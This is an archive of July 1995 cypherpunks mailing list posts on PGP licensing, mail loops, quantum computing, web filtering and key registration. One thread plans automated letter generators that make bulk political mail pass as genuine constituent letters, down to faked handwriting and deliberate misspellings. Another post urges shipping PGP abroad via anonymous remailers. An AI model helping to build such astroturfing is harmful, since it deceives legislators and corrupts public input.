a "revenue source"..I pay $450 per year to register my truck!!!).

This makes trying to register 2^128 keys rather expensive.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 18 Jul 95 16:32:39 PDT
To: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
Subject: Re: Is it legal for commercial companies to use PGP?
In-Reply-To: <5ZsF9c6w165w@voxbox.norden1.com>
Message-ID: <9507182330.AA23645@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
    Date: Tue, 18 Jul 95 09:36:51 EDT

    In practice, I'd probably buy Viacrypt for legal reasons but use
    PGP anyway.

I'd be interesting in hearing some of the lawyers out there comment on
this.  While I know that I can test interoperability, I prefer using
something that I compiled myself which I think is not an option with
Viacrypt.  This is not to say that I could swear that I understand all
of the code that I compiled for the free versions of PGP, but (a) I
have spent considerable time looking at the parts that were most
interesting to me -- even translating some things to other programming
languages and (b) I know that others have also examined the code and
nobody has come up with anything terribly damning.

			Rick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAxDnpNR+/jb2ZlNAQGSWgP/QpeKiOTHFo9x9OMqHyO0iyUoF0RPkZL3
iRnIWNNKCdRWPw4jc6j0m3toG7mnvBt5v/jK122nrbeZBbzEpxGgovA2imOKeD9e
r09irO0Yo7G/T12yXgHOoaJ+69OPUhQFIUnPJGAJ2o5uEaLzRUlfDcsHQYtcx6sT
aRCR9NsbDMM=
=JsSF
-----END PGP SIGNATURE-----

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@PrimeNet.Com>
Date: Tue, 18 Jul 95 12:37:57 PDT
To: Buford Terrell <terrell@sam.neosoft.com>
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
In-Reply-To: <199507181832.NAA27559@sam.neosoft.com>
Message-ID: <Pine.BSI.3.91.950718193426.3567B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Jul 1995, Buford Terrell wrote:

> >
> >>> >and, conspiracy theories non-withstanding, we the people do not govern 
> >>> >America --we are only given a short list of politicians who have sold 
> >>> >their soul to CFR's satanist inner circle.
> >>> 
> >>> What's CFR?
> >>> 
> >>
> >>Council on Foreign Relations.
> >
> >or Code of Federal Regulations.
> >
> or Cupherpunks Fuming and Ranting
>   
>   --buford
> 

    aw right!  I like that last one --it fits!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 18 Jul 95 16:48:14 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: SurfWatch for employees (ugh)
In-Reply-To: <199507182255.PAA06275@ix5.ix.netcom.com>
Message-ID: <199507182354.TAA20153@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:

> >its list of interesting (err, forbidden) sites priced at $1,500. 
> Wow!  Folks have finally found a way to get paid for looking for porn on the
> net! :-)
> Surfwatch doesn't make it's censored list easily available (otherwise it'd
> probably get pirated, or used as an "interesting sites" index...), but
> apparently
> it blocks access to things other than just pornography - does Webster
> indicate what categories of stuff they're blocking?

I think there's a definite need here. If some obliging soul can "blow the
whistle" by posting to the net 1) Surfwatch's list of banned sites, and/or
2) the criteria Surfwatch uses when determining what sites to block, it
would certainly be beneficial. At the very least, it would allow everyone
to see what sort of information they believe is "harmful to minors".

-- 

 frogfarm@yakko.cs.wmich.edu | To ensure ABSOLUTE FREEDOM, take RESPONSIBILITY
    imschira@nyx10.cs.du.edu | Encrypt! Encrypt! All-One-Key! Complete Privacy
             Damaged Justice | through Complex Mathematics! God's law PREVENTS
Need net.help? I'm available | decryption above 1024 bytes - Exceptions? None!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Tue, 18 Jul 95 17:06:51 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: We appear...
In-Reply-To: <9507182318.AA08206@webster.imsi.com>
Message-ID: <199507190006.UAA17547@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


.pm writes:
> We appear to have an nntp/mail loop in progress. I believe the problem
> is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the
> mailing list (ugh!).

Not exclusively, though -- I've been seeing sporadic stuff from mnemosyne for
a week or more. I wrote to postmaster@cs.du.edu and it bounced from someone's
personal mailbox (!)

Duplicates of some of Bob Hayden's articles have been appearing via NNTP
from krypton.mankato.msu.edu lately, too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Tue, 18 Jul 95 17:54:59 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Quantum computing/crypto
Message-ID: <Pine.SOL.3.91.950718201132.22080B-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


C-punx,

Before the list cratered I had been intending to respond to Doug 
Hughes post about the quantum computing news piece by James Glanz in 
SCIENCE magazine, 7th July, vol. 269, pg. 28-29.

If you are reading this thread you may be aware of Peter Shor's 
development of an algorithm that uses quantum logic to factor large 
numbers.  This was discussed on the list last year and the general take 
on it was that there was no way to build a functioning quantum computer, 
and even if there were the code-maker would end up ahead of the code 
breaker.  

Well, it seems that his work stimulated some further interest in 
the design and construction of quantum computers and even a conference in 
Torino, Italy a few weeks ago.  In the 15th May Physical Review Letters 
ther are a number of papers on QC's, including one by Ignacio Cirac & 
Peter Zoller that describes the construction of a quantum logic gate.  
This builds on an article in same issue of PRL by Artur Ekert, 
David Deutsch and Adriano Barenco describing how by trapping ions 
in an electric field just above zero degrees Kelvin one can build a 
"quantum wire" which will pass information without measuring it (and 
therefore collapsing the quantum uncertainty).  Chris Monroe and David 
Wineland at NIST in Boulder have already built a simplified version of 
this quantum logic gate device, and have written a proposal to factor 
the number 15 using the technique.  The hardware involved will be about 
10 mercury atoms.  

There is airtime at the end of the piece for skeptics citing the 
calculations showing that "small errors in a QC can accumulate 
exponentially and no one has figured out a satisfactory way of reaching 
into the quantum world to correct them".

As I mentioned before there is a sidebar talking about the successful 
demonstration of quantum cryptography over 14 kilometeres of fiber optic 
cable in Los Alamos by Richard Hughes and colleagues, apparently 
announced at a conference held last month at the Univ. of Rochester in 
New York.  Alice and Bob can swap bits encoded in the quantum properties 
of photons that can't be intercepted with out them knowing that something 
is amiss.
 

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 18 Jul 95 17:55:20 PDT
To: perry@imsi.com
Subject: Re: We appear...
In-Reply-To: <9507182318.AA08206@webster.imsi.com>
Message-ID: <199507190055.UAA01226@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| We appear to have an nntp/mail loop in progress. I believe the problem
| is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the
| mailing list (ugh!).

This very simple procmailrc rule means that you never notice such
ugliness. 

:0 Wh: msgid.lock
| formail -D 65536 .msgid.cache


procmail:
ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/procmail.tar.gz


Adam



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Tue, 18 Jul 95 18:03:11 PDT
To: cypherpunks@toad.com
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <5gog9c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Gillogly <jim@acm.org> writes:

> 
> > Rick Busdiecker <rfb@lehman.com> writes:
> >   From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
> 
> >   In practice, I'd probably buy Viacrypt for legal reasons but use
> >   PGP anyway.
> 
> >I'd be interesting in hearing some of the lawyers out there comment on
> >this.
> 
> Does RSADSI count as having lawyers?  So far as I know they have not
> commented in public about whether the ViaCrypt license is valid, but
> they have also not (to my knowledge) contested it.  However, Jim Bidzos
> has explicitly said that it is not acceptable to buy a ViaCrypt license
> to cover your use of non-ViaCrypt PGP.

Hmm, does that make anyone besides me wonder about that unpulished source
code? 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAxYot74r4kaz3mVAQESFwP/cws/p52apS7V7xMZ/7jHmarUKLSpxOox
nOk8sirst2p9vQqzvR88lwzmGecLb1/lc/mWKzAV1DT4dMAzyljV7d9UIiW0wTvk
i5I4o7IQ9ogppdzEt7XdG0rlQCAHHsUYYa1oVufz4OtOd0cHi2SRXje7XSTrxQYF
0FbSsqZsxuw=
=YrUs
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 18 Jul 95 19:06:11 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: We appear...
In-Reply-To: <199507190006.UAA17547@thor.cs.umass.edu>
Message-ID: <Pine.ULT.3.91.950718210509.19834D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 18 Jul 1995, L. McCarthy wrote:

> Duplicates of some of Bob Hayden's articles have been appearing via NNTP
> from krypton.mankato.msu.edu lately, too.

I've been posting those duplicate articles to alt.security.pgp at the same
time (using pine as a mailer/news poster), so I'm assuming that somebody's
news server is getting the message and passing it to the mail address. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.1

iQCVAwUBMAxoqzokqlyVGmCFAQGGOgP/S5ooqSSc0mb238KX0nelloblqyqmvFNc
vsNq+wqHN58KYdoQC+B/cO4Vhj9CRBfe+RFA3oiStqNf397MgTuUjbSl58OZ8zLI
zXQdSPkBbLZ4Lemz1uxDadLt/1qTR9ohT51pMiJEOnd2a388WpoSCdnrPuEmARH7
y2ASm/44978=
=kI+e
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 18 Jul 95 17:29:22 PDT
To: jim@acm.org
Subject: Re: Is it legal for commercial companies to use PGP?
In-Reply-To: <199507182358.QAA10553@mycroft.rand.org>
Message-ID: <m0sYNhb-0009tNC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> > Rick Busdiecker <rfb@lehman.com> writes:
> >   From: "Jim Grubs, W8GRT" <jgrubs@voxbox.norden1.com>
> 
> >   In practice, I'd probably buy Viacrypt for legal reasons but use
> >   PGP anyway.
> 
> >I'd be interesting in hearing some of the lawyers out there comment on
> >this.
> 
> Does RSADSI count as having lawyers?  So far as I know they have not
> commented in public about whether the ViaCrypt license is valid, but
> they have also not (to my knowledge) contested it.  However, Jim Bidzos
> has explicitly said that it is not acceptable to buy a ViaCrypt license
> to cover your use of non-ViaCrypt PGP.
> 
> 	Jim Gillogly
> 	Hevensday, 25 Afterlithe S.R. 1995, 23:53

IANAL, but I find this position to be stretching the limits of
credible grounds for a successful lawsuit.  My reasoning is that most
(all?) patent and copyright lawsuits are based on theft of services or
other forms of lost income.  If you collected a fee for a usage that
was identical in function to one that actually took place, (or even
close) I don't see how you could argue that any income was lost.

Technically he can decide what to allow as the license 'owner'/controller,
but that's different from having standing to sue.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <wd803@freenet.victoria.bc.ca>
Date: Tue, 18 Jul 95 21:25:53 PDT
To: cypherpunks@toad.com
Subject: Automatic Rant generator
Message-ID: <Pine.2.2.9507182108.A29780@vifa1>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Date:     Mon Jul 17, 1995  5:22 pm  GMT
From:     Timothy C. May
Subject:  Automated Rant Generators and Letter Generators
 
At 7:35 AM 7/17/95, Martin Hamilton wrote:
>MONTY HARDER writes:
>
>| Anyone who has read MAD Magazine could put such together. As an added
>| bonus, use variable margin settings, and none of the letters would be
>| exactly the same. Appropriate Imail => FAX software on a puter in DC
>| (local call that way) with the phone number of the sender filled in on
>| the top line for ID (izzat legal?) so it doesn't look like a form letter
>| at all.
>
>Plus - choose the fonts & point sizes at random too ? :-)

    Tim May > Cypherpunks could probably have an effect on
    Tim May > hastening this "denial of service" attack on the 
    Tim May > efficacy of letter-writing by releasing an easy-to- 
    Tim May > use package that does all this letter writing at 
    Tim May > the click of a button....just type in some key
    Tim May > words, for the topics, and it does the rest.

    Tim May > An interesting project, actually.

    Actually, your little project could cause some major problems 
    in a area you may not anticipate  --- personnel selection.

    Specifically, the use of Handwriting Analysis as a tool for 
    personnel profiling.

Date:     Mon Jul 17, 1995 11:48 pm  GMT
From:     Harry Bartholomew
Subject:  Re: Automated Rant Generators and Letter Generators
 
    Harry > A final step might be to interface the output to old 
    Harry > pen plotters like my HP7470A with an ascii-to-
    Harry > handwriting program.  Akin to the White House
    Harry > souvenir signature generator, but with a set of
    Harry > parameters to mimic different "hands".  Knuth's
    Harry > Metafont tricks come to mind. 

    Making the little problem Tim presents, a major headache for 
    somebody else --- handwriting analysts.

Date:     Tue Jul 18, 1995  1:18 am  GMT
From:     Timothy C. May
Subject:  Re: Automated Rant Generators and Letter Generators
 
    Tim May > Bart's comments about using Knuth's typographic
    Tim May > work are interesting, to the extent that letters 
    Tim May > need to look handwritten. In the Mac market, it's 
    Tim May > possible to send in some handwriting samples and 
    Tim May > get back a font that emulates the handwriting!

    Actually, True Type fonts of your handwriting are available, 
    for any platform that accepts that font type.  I don't have 
    the URL for them, but there is a pointer to it at 
    HTTP://www.ntu.ac.sg/~tjlow/gclub.html
    
    Tim May > I don't think the pen plotter is actually needed- 
    Tim May > - and few  people would use it--as most fax can

    Using it would play hell for handwriting analysts, though.  
    And if it was programmed to change the pen pressure as well 
    --- the possibilities are staggering.  Can a pen plotter 
    change pressure?

    Tim May > be emulated with laser printers (due of course to
    Tim May > the limited dots per inch resolution). In fact,
    Tim May > most fax modems can directly fax from any screen 
    Tim May > that can produce printed output. So, the
    Tim May > combination of handwriting fonts, automated rant 
    Tim May > generators (of varying rabidities), and fax
    Tim May > capabilities gives a pretty good start. Using lots 
    Tim May > of handwriting samples, various other fonts, and a 
    Tim May > mix of styles in the letters will help.

    Tim May > Anyway, where this all gets interesting is the
    Tim May > following: * Can a kind of Turing Test be tried
    Tim May > here?

    But of course.
    

    Tim May > That is, in this limited domain of "letters to the  
    Tim May > editor/Congressmen," can a letter generator be
    Tim May > implemented which generates letters effectively
    Tim May > indistinguishable from letters and fax generated 
    Tim May > by actual human beings? ("Effectively
    Tim May > indistinguishable" in the sense that a human reader 
    Tim May > could not sort a set of letters into human- and
    Tim May > machine-generated subsets with statistically
    Tim May > significant certainty better than guessing).

    I don't remember the title, but at least one french novel was 
    rumored to have been entirely generated by computer.  

    Tim May > Of course this is also similar to the "style
    Tim May > detectors" we so  often talk about.

    I don't remember the program name, but there is software 
    available now, that analyzes a document, and figures out who 
    wrote it --- based on the frequency count of the letters of 
    the alphabet.  Secondary measures are frequency counts of 
    letter pairs.  Words, phrases, sentences etc are totally 
    ignored.  So what you'd need to do here, to pass your pseudo- 
    Turing Test is a program that generates different statistical 
    results, for allegedly different people.   

    Tim May > The crypto relevance has to do with detecting
    Tim May > patterns in  letters and rants, in emulating these 
    Tim May > patterns, and (perhaps) in speeding up lobbying. 
    Tim May > (Though I agree that widespread adoption of
    Tim May > automated letter-writing, such as the direct mail 
    Tim May > folks are already doing, will eventually just kill 
    Tim May > off letter writing as a means of lobbying.)

    Tim May > This may also hasten the adoption, someday, of
    Tim May > digital  signatures. Congressmen and their aides 
    Tim May > may check incoming letters against databases of
    Tim May > their constituents who have "registered" with them 
    Tim May > (lots of issues here).

    Or might just subject all mail to various automations, which 
    accept/reject mail, based on what it looks for.  << If it 
    passes the congress person's Turing Test, it is read, as being 
    authentic --- although I doubt half the people in the capital 
    could actually pass a Turing Test to begin with.  >>

    Tim May > Merely counting the "yes" and "no" letters has long 
    Tim May > been  problematic, as the Republicans have been
    Tim May > leading in direct mail campaigns since at least the 
    Tim May > mid-70s (recall Richard Viguerie...). Increased
    Tim May > automation will just make it even more obvious.

Date:     Tue Jul 18, 1995  5:23 pm  GMT
From:     Timothy C. May
Subject:  Re: Automated Rant Generators and Letter Generators
 
    Tim May > David Conrad told me he meant for this to go to the 
    Tim May > whole  list, but only sent it to me by mistake. So 
    Tim May > here is his post.


At 4:14 PM 7/18/95, David R. Conrad wrote:
>Tim May <tcmay@sensemedia.net> writes:
>>Bart's comments about using Knuth's typographic work are interesting, to
>>the extent that letters need to look handwritten. In the Mac market, it's
>>possible to send in some handwriting samples and get back a font that
>>emulates the handwriting!
>
>I suppose the resulting font has only one form for each letter?  (Although
>I understand that when you send them a sample, you send several instances
>of each letter; a friend was showing me an add for this.)  The fact that
>each letter is the same every time would be a giveaway.  We need something
>like Metafont, or at least choose from a number of different shapes.
>
>>                                                 ... So, the combination of
>>handwriting fonts, automated rant generators (of varying rabidities), and
>>fax capabilities gives a pretty good start. Using lots of handwriting
>>samples, various other fonts, and a mix of styles in the letters will help.
>
>Another factor that would make it appear more authentic would be spelling
>and grammar errors.  The grammar errors could be built into the rant
>generators (an occasional dangling modifier, an incomplete sentence or two);
>spelling errors could be done by post-processing the output of the rantgens.
>It's important to take into account the different types of spellos that
>occur: commonly misspelled words (aquired, beleive); wrong homophone (their,
>they're, there; two, to, too); transposed letters (transpoesd); near-misses
>on qwerty keyboards (nesr-mosses); and words left out.
>
>--
>David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
>Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
>Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
>No, his mind is not for rent to any god or government.

    Actually, the usual give away, is in letter and letter pair 
    frequencies --- not spelling mistakes, grammatical errors, 
    etc.

    However, there a technique called _Scientific Content 
    ANalysis_ that looks at how things are said, to judge their 
    "truthfulness."  A good program will not show that the text 
    was randomly generated, nor show that the author is off-the- 
    wall, so to speak.

    You may have bitten off a bit more than you can chew here.  
    OTOH, a group that tries to crack keys, knowing that the 
    possibility of success is slim to non-existent, can probably 
    pull this one off --- if only because the possibility of 
    success is pretty good.  

    Er, how did the cracking of the key go?   Last I read 60+%, 
    and no hints of it being broken.   << I almost want to 
    participate, but with a dx25, running NovellDos, I'm not sure 
    what that platform could do.  << I''ll graduate to Linux, 
    after I buy some more memory, and a new hard drive for that 
    sytem.  >>  >>  

    xan

    jonathon


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCzAwUBMAyFtaVRQvz57IB1AQF25wTvQD+eQVxvKOwin+Izb4d5c0u7i6JWWSZR
BoY9T3b7BEhiU6EfKgP4BZabi8gHTM742ROCXAvCZQusWAxLfXSOKwjmUs5ieaD7
f6cEB8/D+EZu395qa0bCu28/hLmKslQvXvsWoMpxcHzhjEHJhYs/0BQxHZoZMsrM
PrfFLqrhdJzhPYn5iy83nhBB54GlKnCIBgfEqaZnHjjC2hzZJJo=
=GyP/
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 18 Jul 95 22:03:37 PDT
To: cypherpunks@toad.com
Subject: Govt mandated key
Message-ID: <9507190503.AA05987@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


If I have to pay for each key that I use, then
I have a particular key in mind for my one time 
pad.  It's a single (trancendental) number that 
starts with a decimal point.  It's the binary 
equivalent of the decimal number:

.012345678910111213141516171819202122......

I promise to only use this one key, and I'll just
select a random offset into it for each message.

Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 18 Jul 95 18:31:44 PDT
To: monty.harder@famend.com
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD747E.00030001AC.uuout@famend.com>
Message-ID: <m0sYOfg-0009tNC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> PE> Rather than spend five minutes writing something on your own you'd end
> PE> up something that looks totally fake.  I believe that what is going on
> 
>   No, that's "rather than not writing anything at all". I know how to
> call and write to my congresscritters. The idea of the WWW page is for
> those who wouldn't take the initiative to do it in the first place.
> 
> PE> would be discerned by a staffer in moments. Crap like this is called
> 
>   They should know, because they send form letters to constituents all
> the time, only they don't bother to vary it a bit.
> 
> PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts.
> 
>   Meanwhile, back at the ranch... If one of our DC members can set up an
> Imail-FAX gateway, we can publicize some nifty Iddresses for folx to
> send things in their own words, if possible, and if they don't have any
> words of their own, they can borrow some. Boilerplate has to be better
> than nothing.

I hereby offer to setup an Email-FAX gateway for the DC/N. VA area if
there is enough interest and some way can be found to defray an Internet
feed, phone line, etc.

Unfortunately I live just over the line where a local line to DC costs
$.50/mo....  At my house it costs $100/mo.  However, I have a number
of friends (and could probably find others) that a PC with Linux
and two phone lines/modems could be placed at to handle this.

I might even have a junk PC that could handle it.

Anyone who spends much on DC faxes now could save a bundle...


I'm familiar with setting up the tpc.int software, so it should integrate
well.

I'm way too busy and overloaded to both pay for and completely set this
up however.

>  * Is there such a thing as a "gruntled" Postal employee?
> ---
>  * Monster@FAmend.Com *    
> 

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Tue, 18 Jul 95 22:28:17 PDT
To: rick hoselton <hoz@univel.telescan.com>
Subject: Re: Govt mandated key
In-Reply-To: <9507190503.AA05987@toad.com>
Message-ID: <Pine.SUN.3.91.950718221833.16687A-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 18 Jul 1995, rick hoselton wrote:

> If I have to pay for each key that I use, then
> I have a particular key in mind for my one time 
> pad.  It's a single (trancendental) number that 
> starts with a decimal point.  It's the binary 
> equivalent of the decimal number:
> 
> .012345678910111213141516171819202122......
> 
> I promise to only use this one key, and I'll just
> select a random offset into it for each message.
> 
> Rick F. Hoselton  (who doesn't claim to present opinions for others)
> 
> 
I wouldn't register my keys and I don't think ANY of us should either.
If they threatened me W/ RICO, I would probably register *A* key but 
certainly not one I EVER indended to actually use.
In a case like this I think massive civil disobediance would be a good 
response.
I would like to see a campaign of sending PGP to random Euros or whoever 
has a foriegn tag through anon. remailers.Like this UU encode it and daisy
chain it to whoever.
How's that sound?
Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: klbarrus@infocom.net (Karl L. Barrus)
Date: Tue, 18 Jul 95 20:57:34 PDT
To: cypherpunks@toad.com
Subject: Re: SurfWatch for employees (ugh)
Message-ID: <199507190359.WAA08094@infocom.net>
MIME-Version: 1.0
Content-Type: text/plain


>Webster Network Strategies has announced (but apparently has not
>shipped) a product similar to SurfWatch but aimed at an employment
>environment. The product is called "WebTrack" and supposedly supports
>access lists of URLs, where access can be allowed to "all but these sites"
>or "only to these sites". The product also can be configured to log all 
>Web usage by users subjected to its reign of terror. :) 

Well, I know there are already products like this out there, because the
company I work for uses one.

I was helping my boss/project lead figure out why he couldn't establish an
account on the penet anonymous server, and in the process of phone calls to
various people, we discovered that the anonymous server at penet is blocked
from our site, and also that every web connection is logged.

Actually, I have no problem with this, even if they restrict usenet feed to
the comp heirarchy, restrict web activity to a list of approved sites, log
all they want to, etc.  That's why I got a seperate account.


--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "ENRIQUE S. IGNARRA" <S0496872@DOMINIC.BARRY.EDU>
Date: Tue, 18 Jul 95 20:02:58 PDT
To: pgp-all%hearn.bitnet@DOMINIC.BARRY.EDU
Subject: Wiping swapfile
Message-ID: <01HT16RSDX3Q000QZQ@DOMINIC.BARRY.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Could someone email me or post to the list where i could get utilities to
wipe my windows swapfile so my PGP pass phrase is not stored in it.

I know such utilities exist, but i don't know where to find them.

Any help would be greatly appreciated!


Thanks!

Enrique
s0496872@dominic.barry.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Wed, 19 Jul 95 00:27:00 PDT
To: cypherpunks@toad.com
Subject: RE: Automatic Rant generator
Message-ID: <Chameleon.4.01.2.950719022545.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>That is, in this limited domain of "letters to the editor/
>Congressmen," can a letter generator be implemented which 
>generates letters effectively indistinguishable from letters 
>and fax generated by actual human beings? ("Effectively
>indistinguishable" in the sense that a human reader could 
>not sort a set of letters into human- and machine-generated 
>subsets with statistically significant certainty better than 
>guessing).

>Bart's comments about using Knuth's typographic work are interesting, to
>the extent that letters need to look handwritten. In the Mac market, it's
>possible to send in some handwriting samples and get back a font that
>emulates the handwriting!


Reading this thread it suddenly became clear:

-The appearance of a letter being handwritten is a temporary factor at best.

  Within a very few years (2-3 I would guess) the growth in the use of email 
and the volume of communications to be sorted into For and Against piles will 
cause a sudden and dramatic shift in Congress to a strong preference for 
incoming email.  Within 10 years they may refuse paper mail.  Any month now 
someone in Congress will tip to the fact that email can be processed by 
programs that can identify the issue and the pro or con position of the 
writer.  Constituents will be encouraged to write, but only in the form of 
email, and to state their position clearly and concisely, i.e. in a form 
suitable for successful parsing, analysis, and classification.

-Political letter renderers will become common on the Web before Nov. 1996.

  There are already renderers of graphic images on the Web.  There would be 
more if it were easy to pay with a 25-cent token, and it *will* be widespread 
and easy to do that, very very soon.  Political letter renderers don't have 
to wait for mass participation in online payment mechanisms -- they have 
ready-made sponsors.  Unlike the occasional effort to sponsor phone calls by 
making an 800 number available, sponsors of letter rendering services can be 
sure those services won't be seriously misused:  The 2nd Amendment 
CongressLetter WebPage will *only* render letters *against* H-1234 or *for* 
S-2345, for example.  The Tree Hugger CongressLetter WebPage (no trees died 
for this Page) will *only* render letters *against* H-9876, etc. etc.  Each 
will return the result of the rendering to you at your email address if you 
don't want to copy it off the web page.  *You* will send the email to your 
congresscritter.

The process will be easy:  Right now any decent programmer could write code 
to allow choices from Column A, B, etc. to generate a plausible letter.  
Generalized, this will allow the operators to create templates for each new 
issue, untouched by programmer hands.  Enhancements will make style, grammar, 
spelling, punctuation variations increasingly sophisticated.

-Rendering services will push email over into reality for Congress.

  Strangely, though the rendered letter is in large part a fabrication, it 
will be this ersatz form of personal communication that will finally force 
Congress to accept the reality of email.  Even though generated by computer, 
the rendered letter will still be an expression of a constituent's opinion on 
an issue.  It will rapidly become the preferred method of expression for many 
people who simply don't have time to make a career out of writing to 
politicians.

-Congress will respond with automated mail tallying.

  Whatever chance there is that your present handwritten letter may actually 
be *read* will vanish completely in the age of email.  Your letter will be 
eaten by an analyzer, acknowledged by an intelligent renderer that may even 
refer to passages in your letter (and may even SEEM TO AGREE WITH YOU), and 
then be trashed.  Letters may be sidetracked if they contain certain 
unacceptable things, because the suits have to be kept busy, but most 
incoming mail will vanish after tallying.  

